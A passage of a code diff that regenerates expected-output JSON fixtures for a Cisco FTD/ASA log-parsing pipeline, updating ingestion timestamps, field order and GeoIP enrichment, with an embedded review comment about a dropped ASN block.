14:02:03 mojo_server.pl: siem-management: admin@10.0.255.31, System \u003e Monitoring \u003e Syslog, Page View\u0000x0a\u0000x00", "code": "" }, "cisco": { "ftd": {} - } - }, - { - "process": { - "name": "index.cgi" - }, - "log": { - "level": "debug" - }, - "syslog": { - "facility": { - "code": 14 - } }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "type": "firewall", "product": "asa", "vendor": "Cisco" }, + "process": { + "name": "index.cgi" + }, "@timestamp": "2019-08-14T14:02:11.000Z", "ecs": { "version": "1.12.0" }, + "log": { + "level": "debug" + }, "host": { "name": "siem-management" }, + "syslog": { + "facility": { + "code": 14 + } + }, "event": { "severity": 7, - "ingested": "2021-12-09T13:33:00.917398300Z", + "ingested": 
"2021-12-14T14:37:43.991245652Z", "original": "\u003c14\u003eAug 14 2019 14:02:11 index.cgi: siem-management: admin@10.0.255.31, System \u003e Monitoring \u003e Audit, Page View\u0000x0a\u0000x00", "code": "" }, "cisco": { "ftd": {} - } - }, - { - "process": { - "name": "mojo_server.pl" - }, - "log": { - "level": "debug" - }, - "syslog": { - "facility": { - "code": 14 - } }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "type": "firewall", "product": "asa", "vendor": "Cisco" }, + "process": { + "name": "mojo_server.pl" + }, "@timestamp": "2019-08-14T14:02:19.000Z", "ecs": { "version": "1.12.0" }, + "log": { + "level": "debug" + }, "host": { "name": "siem-management" }, + "syslog": { + "facility": { + "code": 14 + } + }, "event": { "severity": 7, - "ingested": "2021-12-09T13:33:00.917403600Z", + "ingested": "2021-12-14T14:37:43.991246040Z", "original": "\u003c14\u003eAug 14 2019 14:02:19 mojo_server.pl: siem-management: admin@10.0.255.31, System \u003e Configuration \u003e Configuration, Page View\u0000x0a\u0000x00", "code": "" }, "cisco": { "ftd": {} - } - }, - { - "process": { - "name": "platformSettingEdit.cgi" - }, - "log": { - "level": "debug" - }, - "syslog": { - "facility": { - "code": 14 - } }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "type": "firewall", "product": "asa", "vendor": "Cisco" }, + "process": { + "name": "platformSettingEdit.cgi" + }, "@timestamp": "2019-08-14T14:02:31.000Z", "ecs": { "version": "1.12.0" }, + "log": { + "level": "debug" + }, "host": { "name": "siem-management" }, + "syslog": { + "facility": { + "code": 14 + } + }, "event": { "severity": 7, - "ingested": "2021-12-09T13:33:00.917408900Z", + "ingested": "2021-12-14T14:37:43.991246428Z", "original": "\u003c14\u003eAug 14 2019 14:02:31 platformSettingEdit.cgi: siem-management: admin@10.0.255.31, System \u003e Configuration \u003e Configuration \u003e /platinum/platformSettingEdit.cgi?type=AuditLog, Page View\u0000x0a\u0000x00", "code": 
"" }, "cisco": { "ftd": {} - } - }, - { - "process": { - "name": "platformSettingEdit.cgi" - }, - "log": { - "level": "debug" - }, - "syslog": { - "facility": { - "code": 14 - } }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "type": "firewall", "product": "asa", "vendor": "Cisco" }, + "process": { + "name": "platformSettingEdit.cgi" + }, "@timestamp": "2019-08-14T14:02:38.000Z", "ecs": { "version": "1.12.0" }, + "log": { + "level": "debug" + }, "host": { "name": "siem-management" }, + "syslog": { + "facility": { + "code": 14 + } + }, "event": { "severity": 7, - "ingested": "2021-12-09T13:33:00.917414200Z", + "ingested": "2021-12-14T14:37:43.991246824Z", "original": "\u003c14\u003eAug 14 2019 14:02:38 platformSettingEdit.cgi: siem-management: admin@10.0.255.31, Devices \u003e Platform Settings \u003e Local System Configuration, Save Local System Configuration\u0000x0a\u0000x00", "code": "" }, "cisco": { "ftd": {} - } - }, - { - "process": { - "name": "platformSettingEdit.cgi" - }, - "log": { - "level": "debug" - }, - "syslog": { - "priority": 2, - "facility": { - "code": 14 - } }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "type": "firewall", "product": "asa", "vendor": "Cisco" }, + "process": { + "name": "platformSettingEdit.cgi" + }, "@timestamp": "2019-08-14T14:02:38.000Z", "ecs": { "version": "1.12.0" }, + "log": { + "level": "debug" + }, "host": { "name": "siem-management" }, + "syslog": { + "priority": 2, + "facility": { + "code": 14 + } + }, "event": { "severity": 7, - "ingested": "2021-12-09T13:33:00.917419500Z", + "ingested": "2021-12-14T14:37:43.991247204Z", "original": "\u003c14.2\u003eAug 14 2019 14:02:38 platformSettingEdit.cgi: siem-management: admin@10.0.255.31, Devices \u003e Platform Settings \u003e Audit Log Settings \u003e Modified: Send Audit Log to Syslog enabled \u003e Disabled", "code": "" }, 
@@ -1259,7 +1256,10 @@ "ftd": { "security": {} } - } + }, + "tags": [ + "preserve_original_event" + ] } ] } \ No newline at end of file diff --git a/packages/cisco/data_stream/ftd/_dev/test/pipeline/test-intrusion.log-expected.json b/packages/cisco/data_stream/ftd/_dev/test/pipeline/test-intrusion.log-expected.json index d6e82f0cd2f..585ffd43c2b 100644 --- a/packages/cisco/data_stream/ftd/_dev/test/pipeline/test-intrusion.log-expected.json +++ b/packages/cisco/data_stream/ftd/_dev/test/pipeline/test-intrusion.log-expected.json @@ -15,15 +15,15 @@ "ip": "10.0.1.20" }, "message": "SERVER-WEBAPP Ipswitch WhatsUp Small Business directory traversal attempt", - "tags": [ - "preserve_original_event" - ], "network": { "protocol": "http", "transport": "tcp", "application": "firefox", "iana_number": "6" }, + "tags": [ + "preserve_original_event" + ], "observer": { "ingress": { "interface": { @@ -64,7 +64,7 @@ }, "event": { "severity": 0, - "ingested": "2021-12-09T13:33:02.768491200Z", + "ingested": "2021-12-14T14:37:45.778530267Z", "original": "2019-08-16T09:54:00Z firepower %FTD-0-430001: SrcIP: 10.0.1.20, DstIP: 10.0.100.30, SrcPort: 55644, DstPort: 80, Protocol: tcp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, Priority: 1, GID: 1, SID: 17279, Revision: 12, Message: SERVER-WEBAPP Ipswitch WhatsUp Small Business directory traversal attempt, Classification: Attempted User Privilege Gain, User: No Authentication Required, Client: Firefox, ApplicationProtocol: HTTP, IntrusionPolicy: intrusion-policy, ACPolicy: default, NAPPolicy: Balanced Security and Connectivity", "code": "430001", "kind": "alert", 
@@ -129,15 +129,15 @@ "ip": "10.0.1.20" }, "message": "SERVER-WEBAPP Ipswitch WhatsUp Small Business directory traversal attempt", - "tags": [ - "preserve_original_event" - ], "network": { "protocol": "http", "transport": "tcp", "application": "firefox", "iana_number": "6" }, + "tags": [ + "preserve_original_event" + ], "observer": { "ingress": { "interface": { @@ -178,7 +178,7 @@ }, "event": { "severity": 0, - "ingested": "2021-12-09T13:33:02.768499400Z", + "ingested": "2021-12-14T14:37:45.778533414Z", "original": "2019-08-16T09:57:02Z firepower %FTD-0-430001: SrcIP: 10.0.1.20, DstIP: 10.0.100.30, SrcPort: 55868, DstPort: 80, Protocol: tcp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, Priority: 1, GID: 1, SID: 17279, Revision: 12, Message: SERVER-WEBAPP Ipswitch WhatsUp Small Business directory traversal attempt, Classification: Attempted User Privilege Gain, User: No Authentication Required, Client: Firefox, ApplicationProtocol: HTTP, IntrusionPolicy: intrusion-policy, ACPolicy: default, NAPPolicy: Balanced Security and Connectivity", "code": "430001", "kind": "alert", @@ -243,13 +243,13 @@ "ip": "10.0.100.30" }, "message": "APP-DETECT failed FTP login attempt", - "tags": [ - "preserve_original_event" - ], "network": { "iana_number": "6", "transport": "tcp" }, + "tags": [ + "preserve_original_event" + ], "observer": { "ingress": { "interface": { 
@@ -290,7 +290,7 @@ }, "event": { "severity": 0, - "ingested": "2021-12-09T13:33:02.768504900Z", + "ingested": "2021-12-14T14:37:45.778533878Z", "original": "2019-08-16T10:04:44Z firepower %FTD-0-430001: SrcIP: 10.0.100.30, DstIP: 10.0.1.20, SrcPort: 21, DstPort: 39114, Protocol: tcp, IngressInterface: outside, EgressInterface: inside, IngressZone: output-zone, EgressZone: input-zone, Priority: 3, GID: 1, SID: 13360, Revision: 6, Message: APP-DETECT failed FTP login attempt, Classification: Misc Activity, User: No Authentication Required, IntrusionPolicy: intrusion-policy, ACPolicy: default, NAPPolicy: Balanced Security and Connectivity", "code": "430001", "kind": "alert", @@ -353,13 +353,13 @@ "ip": "10.0.100.30" }, "message": "APP-DETECT failed FTP login attempt", - "tags": [ - "preserve_original_event" - ], "network": { "iana_number": "6", "transport": "tcp" }, + "tags": [ + "preserve_original_event" + ], "observer": { "ingress": { "interface": { @@ -400,7 +400,7 @@ }, "event": { "severity": 0, - "ingested": "2021-12-09T13:33:02.768510300Z", + "ingested": "2021-12-14T14:37:45.778534262Z", "original": "2019-08-16T10:09:47Z firepower %FTD-0-430001: SrcIP: 10.0.100.30, DstIP: 10.0.1.20, SrcPort: 21, DstPort: 40740, Protocol: 6, IngressInterface: outside, EgressInterface: inside, IngressZone: output-zone, EgressZone: input-zone, Priority: 3, GID: 1, SID: 13360, Revision: 6, Message: APP-DETECT failed FTP login attempt, Classification: Misc Activity, User: No Authentication Required, IntrusionPolicy: intrusion-policy, ACPolicy: default, NAPPolicy: Balanced Security and Connectivity", "code": "430001", "kind": "alert", diff --git a/packages/cisco/data_stream/ftd/_dev/test/pipeline/test-no-type-id.log-expected.json b/packages/cisco/data_stream/ftd/_dev/test/pipeline/test-no-type-id.log-expected.json index adc27b67bf5..d11000438f6 100644 --- a/packages/cisco/data_stream/ftd/_dev/test/pipeline/test-no-type-id.log-expected.json 
+++ b/packages/cisco/data_stream/ftd/_dev/test/pipeline/test-no-type-id.log-expected.json @@ -17,13 +17,13 @@ "ip": "10.1.123.45" }, "message": "Intrusion attempt", - "tags": [ - "preserve_original_event" - ], "network": { "application": "webserver", "protocol": "http" }, + "tags": [ + "preserve_original_event" + ], "observer": { "hostname": "beats", "product": "asa", @@ -48,7 +48,7 @@ }, "event": { "severity": 7, - "ingested": "2021-12-09T13:33:03.454300100Z", + "ingested": "2021-12-14T14:37:46.471794455Z", "original": "Jan 11 2018 01:00:27 beats ftd[1234]: ApplicationProtocol: http, Client: webserver, DstIP: 10.8.12.47, SrcIP: 10.1.123.45, Message: Intrusion attempt", "code": "430001", "kind": "alert", @@ -109,7 +109,7 @@ }, "event": { "severity": 7, - "ingested": "2021-12-09T13:33:03.454308200Z", + "ingested": "2021-12-14T14:37:46.471797245Z", "original": "Jan 11 2018 01:00:27 beats ftd[1234]: HTTPResponse: 404, Message: Some message here (1:36330:2).", "code": "430001", "kind": "alert", @@ -167,7 +167,7 @@ }, "event": { "severity": 7, - "ingested": "2021-12-09T13:33:03.454313700Z", + "ingested": "2021-12-14T14:37:46.471797755Z", "original": "Jan 11 2018 01:00:27 beats ftd[1234]: HTTPResponse: 404, Message: Some message here (1:36330:2), Empty: ,FileCount:, IngressZone:", "code": "430002", "kind": "event", @@ -243,7 +243,7 @@ }, "event": { "severity": 3, - "ingested": "2021-12-09T13:33:03.454319Z", + "ingested": "2021-12-14T14:37:46.471798145Z", "original": "Jan 11 2018 01:00:27 beats ftd[1234]: %ASA-3-430005 Message: This one has a type id, HTTPResponse: 404, Message: And two messages, SrcIP: 127.0.0.1, DstIP: 192.168.3.33, SrcPort: 512, DstPort: 64311", "code": "430005", "kind": "alert", diff --git a/packages/cisco/data_stream/ftd/_dev/test/pipeline/test-not-ip.log-expected.json b/packages/cisco/data_stream/ftd/_dev/test/pipeline/test-not-ip.log-expected.json index f31faf15512..5de3d206fb9 100644 
--- a/packages/cisco/data_stream/ftd/_dev/test/pipeline/test-not-ip.log-expected.json +++ b/packages/cisco/data_stream/ftd/_dev/test/pipeline/test-not-ip.log-expected.json @@ -7,20 +7,14 @@ "destination": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.144", @@ -73,7 +67,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:33:03.880922800Z", + "ingested": "2021-12-14T14:37:46.872025477Z", "original": "\u003c165\u003eOct 04 2019 15:27:55: %ASA-5-106100: access-list AL-DMZ-LB-IN denied tcp LB-DMZ/WHAT-IS-THIS-A-HOSTNAME-192.168.2.244(27218) -\u003e OUTSIDE/81.2.69.144(53) hit-cnt 1 first hit [0x16847359, 0x00000000]", "code": "106100", "kind": "event", @@ -138,7 +132,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:03.880928800Z", + "ingested": "2021-12-14T14:37:46.872028339Z", "original": "Jan 1 2020 10:42:53 localhost : %ASA-6-302021: Teardown ICMP connection for faddr 172.24.177.29/0 gaddr mydomain.example.net/17233 laddr 192.168.132.46/17233", "code": "302021", "kind": "event", @@ -220,7 +214,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:33:03.880933800Z", + "ingested": "2021-12-14T14:37:46.872028753Z", "original": "Jan 2 2020 11:33:20 localhost : %ASA-4-338204: Dynamic filter dropped greylisted TCP traffic from eth0:10.10.10.1/1234 (source.example.net/11234) to wan:172.24.177.3/80 (www.example.org/80), destination malicious address resolved from dynamic list: example.org, threat-level: high, category: malware", "code": "338204", "kind": "event", 
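Review bot: The regenerated expectation for 81.2.69.144 drops the entire `destination.as` block (`"number": 20712`, `"organization": {"name": "Andrews & Arnold Ltd"}`) together with the city/region change, so this test no longer asserts that ASN enrichment runs for the destination address. That is presumably a side effect of a different GeoIP/ASN test database in the updated test tooling rather than a pipeline change, but nothing in the diff proves it, so please confirm the ftd pipeline's ASN lookup still populates `destination.as.*` on the new stack for an address the test database does cover. If the new test ASN database simply has no entry for this prefix, a one-line note in the PR description would stop the next reader from treating the missing `as` object as a regression. The same `as` removal recurs further down in test-security-connection.log-expected.json.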
diff --git a/packages/cisco/data_stream/ftd/_dev/test/pipeline/test-sample.log-expected.json b/packages/cisco/data_stream/ftd/_dev/test/pipeline/test-sample.log-expected.json index 7fda427d8c5..6ee48db1219 100644 --- a/packages/cisco/data_stream/ftd/_dev/test/pipeline/test-sample.log-expected.json +++ b/packages/cisco/data_stream/ftd/_dev/test/pipeline/test-sample.log-expected.json @@ -48,7 +48,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:33:04.305642200Z", + "ingested": "2021-12-14T14:37:47.267657061Z", "original": "Apr 15 2013 09:36:50: %FTD-4-106023: Deny tcp src dmz:10.1.2.30/63016 dst outside:192.168.0.8/53 by access-group \"acl_dmz\" [0xe3aab522, 0x0]", "code": "106023", "kind": "event", @@ -118,7 +118,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:33:04.305651100Z", + "ingested": "2021-12-14T14:37:47.267659298Z", "original": "Apr 15 2013 09:36:50: %FTD-4-106023: Deny tcp src dmz:10.1.2.30/63016 dst outside:192.168.0.8/53 type 3, code 0, by access-group \"acl_dmz\" [0xe3aab522, 0x0]", "code": "106023", "kind": "event", @@ -188,7 +188,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:33:04.305656700Z", + "ingested": "2021-12-14T14:37:47.267659684Z", "original": "Apr 15 2014 09:34:34 EDT: %FTD-session-5-106100: access-list acl_in permitted tcp inside/10.1.2.16(2241) -\u003e outside/192.168.0.89(2000) hit-cnt 1 first hit [0x71a87d94, 0x0]", "code": "106100", "kind": "event", @@ -266,7 +266,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:04.305662Z", + "ingested": "2021-12-14T14:37:47.267660023Z", "original": "Apr 24 2013 16:00:28 INT-FW01 : %FTD-6-106100: access-list inside denied udp inside/172.29.2.101(1039) -\u003e outside/192.168.2.10(53) hit-cnt 1 first hit [0xd820e56a, 0x0]", "code": "106100", "kind": "event", 
@@ -343,7 +343,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:04.305667500Z", + "ingested": "2021-12-14T14:37:47.267660370Z", "original": "Apr 24 2013 16:00:27 INT-FW01 : %FTD-6-106100: access-list inside permitted udp inside/172.29.2.3(1065) -\u003e outside/192.168.2.57(53) hit-cnt 144 300-second interval [0xe982c7a4, 0x0]", "code": "106100", "kind": "event", @@ -413,7 +413,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:04.305672900Z", + "ingested": "2021-12-14T14:37:47.267660718Z", "original": "Apr 29 2013 12:59:50: %FTD-6-305011: Built dynamic TCP translation from outside:10.123.3.42/4952 to outside:192.168.2.130/12834", "code": "305011", "kind": "event", @@ -484,7 +484,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:04.305678200Z", + "ingested": "2021-12-14T14:37:47.267661049Z", "original": "Apr 29 2013 12:59:50: %FTD-6-302013: Built outbound TCP connection 89743274 for outside:192.168.2.43/443 (192.168.2.43/443) to outside:10.123.3.42/4952 (10.123.3.42/12834)", "code": "302013", "kind": "event", @@ -556,7 +556,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:04.305683500Z", + "ingested": "2021-12-14T14:37:47.267661388Z", "original": "Apr 29 2013 12:59:50: %FTD-6-305011: Built dynamic UDP translation from outside:10.123.1.35/52925 to outside:192.168.2.130/25882", "code": "305011", "kind": "event", @@ -631,7 +631,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:04.305688800Z", + "ingested": "2021-12-14T14:37:47.267661716Z", "original": "Apr 29 2013 12:59:50: %FTD-6-302015: Built outbound UDP connection 89743275 for outside:192.168.2.222/53 (192.168.2.43/53) to outside:10.123.1.35/52925 (10.123.1.35/25882)", "code": "302015", "kind": "event", 
@@ -703,7 +703,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:04.305694200Z", + "ingested": "2021-12-14T14:37:47.267662058Z", "original": "Apr 29 2013 12:59:50: %FTD-6-305011: Built dynamic TCP translation from outside:10.123.3.42/4953 to outside:192.168.2.130/45392", "code": "305011", "kind": "event", @@ -776,7 +776,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:04.305699600Z", + "ingested": "2021-12-14T14:37:47.267662390Z", "original": "Apr 29 2013 12:59:50: %FTD-6-302013: Built outbound TCP connection 89743276 for outside:192.168.2.1/80 (192.168.2.1/80) to outside:10.123.3.42/4953 (10.123.3.130/45392)", "code": "302013", "kind": "event", @@ -850,7 +850,7 @@ "event": { "severity": 6, "duration": 5025000000000, - "ingested": "2021-12-09T13:33:04.305705400Z", + "ingested": "2021-12-14T14:37:47.267662916Z", "original": "Apr 29 2013 12:59:50: %FTD-6-302016: Teardown UDP connection 89743275 for outside:192.168.2.222/53 to inside:10.123.1.35/52925 duration 1:23:45 bytes 140", "code": "302016", "kind": "event", @@ -923,7 +923,7 @@ "event": { "severity": 6, "duration": 36000000000000, - "ingested": "2021-12-09T13:33:04.305710800Z", + "ingested": "2021-12-14T14:37:47.267663259Z", "original": "Apr 29 2013 12:59:50: %FTD-6-302016: Teardown UDP connection 666 for outside:192.168.2.222/53 user1 to inside:10.123.1.35/52925 user2 duration 10:00:00 bytes 9999999", "code": "302016", "kind": "event", @@ -991,7 +991,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:04.305716100Z", + "ingested": "2021-12-14T14:37:47.267663623Z", "original": "Jun 04 2011 21:59:52 FJSG2NRFW01 : %FTD-6-302021: Teardown ICMP connection for faddr 172.24.177.29/0 gaddr 192.168.132.46/17233 laddr 192.168.132.46/17233", "code": "302021", "kind": "event", 
@@ -1058,7 +1058,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:04.305721600Z", + "ingested": "2021-12-14T14:37:47.267663952Z", "original": "Apr 29 2013 12:59:50: %FTD-6-305011: Built dynamic TCP translation from inside:192.168.3.42/4954 to outside:192.168.0.130/10879", "code": "305011", "kind": "event", @@ -1131,7 +1131,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:04.305727Z", + "ingested": "2021-12-14T14:37:47.267664284Z", "original": "Apr 29 2013 12:59:50: %FTD-6-302013: Built outbound TCP connection 89743277 for outside:192.168.0.17/80 (192.168.0.17/80) to inside:192.168.3.42/4954 (10.0.0.130/10879)", "code": "302013", "kind": "event", @@ -1195,7 +1195,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:33:04.305732600Z", + "ingested": "2021-12-14T14:37:47.267664735Z", "original": "Apr 30 2013 09:22:33: %FTD-2-106007: Deny inbound UDP from 192.168.0.66/12981 to 10.1.2.60/53 due to DNS Query", "code": "106007", "kind": "event", @@ -1261,7 +1261,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:33:04.305737900Z", + "ingested": "2021-12-14T14:37:47.267665061Z", "original": "Apr 30 2013 09:22:38: %FTD-5-106100: access-list acl_in permitted tcp inside/10.0.0.16(2006) -\u003e outside/192.168.0.89(2000) hit-cnt 1 first hit [0x71a87d94, 0x0]", "code": "106100", "kind": "event", @@ -1331,7 +1331,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:33:04.305743300Z", + "ingested": "2021-12-14T14:37:47.267665388Z", "original": "Apr 30 2013 09:22:38: %FTD-5-106100: access-list acl_in permitted tcp inside/10.0.0.46(49734) -\u003e outside/192.168.0.88(40443) hit-cnt 1 first hit [0x71a87d94, 0x0]", "code": "106100", "kind": "event", 
@@ -1401,7 +1401,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:33:04.305748800Z", + "ingested": "2021-12-14T14:37:47.267665714Z", "original": "Apr 30 2013 09:22:39: %FTD-5-106100: access-list acl_in permitted tcp inside/10.0.0.46(49735) -\u003e outside/192.168.0.88(40443) hit-cnt 1 first hit [0x71a87d94, 0x0]", "code": "106100", "kind": "event", @@ -1471,7 +1471,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:33:04.305754300Z", + "ingested": "2021-12-14T14:37:47.267666054Z", "original": "Apr 30 2013 09:22:39: %FTD-5-106100: access-list acl_in permitted tcp inside/10.0.0.46(49736) -\u003e outside/192.168.0.88(40443) hit-cnt 1 first hit [0x71a87d94, 0x0]", "code": "106100", "kind": "event", @@ -1541,7 +1541,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:33:04.305759600Z", + "ingested": "2021-12-14T14:37:47.267666396Z", "original": "Apr 30 2013 09:22:39: %FTD-5-106100: access-list acl_in permitted tcp inside/10.0.0.46(49737) -\u003e outside/192.168.0.88(40443) hit-cnt 1 first hit [0x71a87d94, 0x0]", "code": "106100", "kind": "event", @@ -1611,7 +1611,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:33:04.305765Z", + "ingested": "2021-12-14T14:37:47.267666738Z", "original": "Apr 30 2013 09:22:40: %FTD-5-106100: access-list acl_in permitted tcp inside/10.0.0.46(49738) -\u003e outside/192.168.0.88(40443) hit-cnt 1 first hit [0x71a87d94, 0x0]", "code": "106100", "kind": "event", @@ -1681,7 +1681,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:33:04.305770500Z", + "ingested": "2021-12-14T14:37:47.267667171Z", "original": "Apr 30 2013 09:22:41: %FTD-5-106100: access-list acl_in permitted tcp inside/10.0.0.46(49746) -\u003e outside/192.168.0.88(40443) hit-cnt 1 first hit [0x71a87d94, 0x0]", "code": "106100", "kind": "event", 
@@ -1751,7 +1751,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:33:04.305776Z", + "ingested": "2021-12-14T14:37:47.267667512Z", "original": "Apr 30 2013 09:22:47: %FTD-5-106100: access-list acl_in permitted tcp inside/10.0.0.16(2007) -\u003e outside/192.168.0.89(2000) hit-cnt 1 first hit [0x71a87d94, 0x0]", "code": "106100", "kind": "event", @@ -1821,7 +1821,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:33:04.305781400Z", + "ingested": "2021-12-14T14:37:47.267667842Z", "original": "Apr 30 2013 09:22:48: %FTD-5-106100: access-list acl_in permitted tcp inside/10.0.0.13(43013) -\u003e dmz/192.168.33.31(25) hit-cnt 1 first hit [0x71a87d94, 0x0]", "code": "106100", "kind": "event", @@ -1891,7 +1891,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:33:04.305786800Z", + "ingested": "2021-12-14T14:37:47.267668175Z", "original": "Apr 30 2013 09:22:56: %FTD-5-106100: access-list acl_in permitted tcp inside/10.0.0.16(2008) -\u003e outside/192.168.0.89(2000) hit-cnt 1 first hit [0x71a87d94, 0x0]", "code": "106100", "kind": "event", @@ -1957,7 +1957,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:33:04.305792Z", + "ingested": "2021-12-14T14:37:47.267668510Z", "original": "Apr 30 2013 09:23:02: %FTD-2-106006: Deny inbound UDP from 192.168.2.66/137 to 10.1.2.42/137 on interface inside", "code": "106006", "kind": "event", @@ -2017,7 +2017,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:33:04.305797400Z", + "ingested": "2021-12-14T14:37:47.267668841Z", "original": "Apr 30 2013 09:23:03: %FTD-2-106007: Deny inbound UDP from 192.168.2.66/12981 to 10.1.5.60/53 due to DNS Query", "code": "106007", "kind": "event", 
@@ -2083,7 +2083,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:33:04.305802800Z", + "ingested": "2021-12-14T14:37:47.267669186Z", "original": "Apr 30 2013 09:23:06: %FTD-5-106100: access-list acl_in permitted tcp inside/10.0.0.16(2009) -\u003e outside/192.168.0.89(2000) hit-cnt 1 first hit [0x71a87d94, 0x0]", "code": "106100", "kind": "event", @@ -2153,7 +2153,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:33:04.305808200Z", + "ingested": "2021-12-14T14:37:47.267669578Z", "original": "Apr 30 2013 09:23:08: %FTD-5-106100: access-list acl_in permitted tcp inside/10.0.0.46(49776) -\u003e outside/192.168.0.88(40443) hit-cnt 1 first hit [0x71a87d94, 0x0]", "code": "106100", "kind": "event", @@ -2223,7 +2223,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:33:04.305813500Z", + "ingested": "2021-12-14T14:37:47.267669908Z", "original": "Apr 30 2013 09:23:15: %FTD-5-106100: access-list acl_in permitted tcp inside/10.0.0.16(2010) -\u003e outside/192.168.0.89(2000) hit-cnt 1 first hit [0x71a87d94, 0x0]", "code": "106100", "kind": "event", @@ -2293,7 +2293,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:33:04.305818800Z", + "ingested": "2021-12-14T14:37:47.267670249Z", "original": "Apr 30 2013 09:23:24: %FTD-5-106100: access-list acl_in denied tcp inside/10.0.0.16(2011) -\u003e outside/192.168.0.89(2000) hit-cnt 1 first hit [0x71a87d94, 0x0]", "code": "106100", "kind": "event", @@ -2363,7 +2363,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:33:04.305824200Z", + "ingested": "2021-12-14T14:37:47.267670582Z", "original": "Apr 30 2013 09:23:34: %FTD-5-106100: access-list acl_in denied tcp inside/10.0.0.16(2012) -\u003e outside/192.168.0.89(2000) hit-cnt 1 first hit [0x71a87d94, 0x0]", "code": "106100", "kind": "event", 
@@ -2433,7 +2433,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:33:04.305829800Z", + "ingested": "2021-12-14T14:37:47.267671031Z", "original": "Apr 30 2013 09:23:40: %FTD-4-106023: Deny tcp src outside:192.168.2.126/53638 dst inside:10.0.0.132/8111 by access-group \"acl_out\" [0x71761f18, 0x0]", "code": "106023", "kind": "event", @@ -2503,7 +2503,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:33:04.305835200Z", + "ingested": "2021-12-14T14:37:47.267674656Z", "original": "Apr 30 2013 09:23:41: %FTD-4-106023: Deny tcp src outside:192.168.2.126/53638 dst inside:10.0.0.132/8111 by access-group \"acl_out\" [0x71761f18, 0x0]", "code": "106023", "kind": "event", @@ -2573,7 +2573,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:33:04.305840600Z", + "ingested": "2021-12-14T14:37:47.267675270Z", "original": "Apr 30 2013 09:23:43: %FTD-5-106100: access-list acl_in est-allowed tcp inside/10.0.0.46(49840) -\u003e outside/192.168.0.88(40443) hit-cnt 1 first hit [0x71a87d94, 0x0]", "code": "106100", "kind": "event", @@ -2643,7 +2643,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:33:04.305847900Z", + "ingested": "2021-12-14T14:37:47.267675753Z", "original": "Apr 30 2013 09:23:43: %FTD-5-106100: access-list acl_in est-allowed tcp inside/10.0.0.16(2013) -\u003e outside/192.168.0.89(2000) hit-cnt 1 first hit [0x71a87d94, 0x0]", "code": "106100", "kind": "event", @@ -2713,7 +2713,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:33:04.305853500Z", + "ingested": "2021-12-14T14:37:47.267676279Z", "original": "Apr 15 2018 09:34:34 EDT: %FTD-session-5-106100: access-list acl_in permitted tcp inside/10.0.0.16(2241) -\u003e outside/192.168.0.99(2000) hit-cnt 1 first hit [0x71a87d94, 0x0]", "code": "106100", "kind": "event", 
